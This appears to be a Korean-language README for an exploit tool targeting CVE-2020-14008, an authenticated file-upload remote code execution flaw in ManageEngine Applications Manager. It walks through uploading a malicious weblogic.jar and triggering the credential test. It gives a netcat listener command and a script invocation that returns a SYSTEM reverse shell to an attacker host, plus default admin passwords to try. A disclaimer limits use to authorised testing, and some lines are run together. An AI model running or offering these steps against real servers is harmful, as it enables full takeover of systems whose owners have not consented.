
CVE-2020-14008 - ManageEngine Applications Manager RCE
Zoho ManageEngine Applications Manager에서 인증된 사용자를 통한 원격 코드 실행 (임의 파일 업로드) (버전 <= 14720).
| 세부사항 | 값 |
|---|---|
| CVE | CVE-2020-14008 |
| CVSS | 7.2 (높음) |
| 유형 | 인증된 RCE / 임의 파일 업로드 |
| 제품 | Zoho ManageEngine Applications Manager |
| 영향 받는 버전 | 버전 14720 이하 |
| 요구 사항 | 유효한 관리자 자격 증명 |
| 결과 | SYSTEM 권한의 리버스 셸 |
이 익스플로잇은 Weblogic 모니터 자격 증명 테스트 기능을 악용합니다. 인증된 관리자가 악성 weblogic.jar 파일을 예상되는 Weblogic 라이브러리 경로에 업로드합니다. 자격 증명 테스트가 트리거되면 ManageEngine은 JarLoader.loadClass() 및 newInstance()를 통해 업로드된 JAR에서 weblogic.jndi.Environment를 로드하여 임의 Java 코드를 실행합니다.
javac 및 jar이 PATH에 있어야 함)nc (netcat)pip3 install requests urllib3 lxml
nc -lvnp 1337
python3 cve-2020-14008.py <URL> <USERNAME> <PASSWORD> <LHOST> <LPORT>
# Basic
python3 cve-2020-14008.py https://192.168.100.2:8443 admin admin 192.168.100.3 1337
weblogic.jndi.Environment)를 컴파일하여 weblogic.jar로 생성classes/weblogic/version8/ 경로에 JAR 업로드 (대체: 이동을 위한 예약 작업 생성)/testCredential.do에서 Weblogic 자격 증명 테스트 호출, 악성 클래스 로드 및 인스턴스화| 사용자명 | 비밀번호 |
|---|---|
| admin | admin |
| admin | password |
| administrator | administrator |
| guest | guest |
| 오류 | 해결 방법 |
|---|---|
release version 7 not supported | Java 21+에서 Java 7 타겟을 제거했습니다. 스크립트는 --release 8을 사용합니다. |
FileNotFoundError: weblogic.jar | JAR 컴파일 실패. javac와 jar이 PATH에 있는지 확인하세요. |
No valid response from used session | 잘못된 자격 증명 |
Actionname not found | 작업 생성 실패, 관리자 권한을 확인하세요. |
이 도구는 허가된 침투 테스트 및 보안 연구 목적으로만 제공됩니다. 귀하가 소유하거나 테스트 권한이 없는 시스템에 대한 무단 사용은 불법입니다.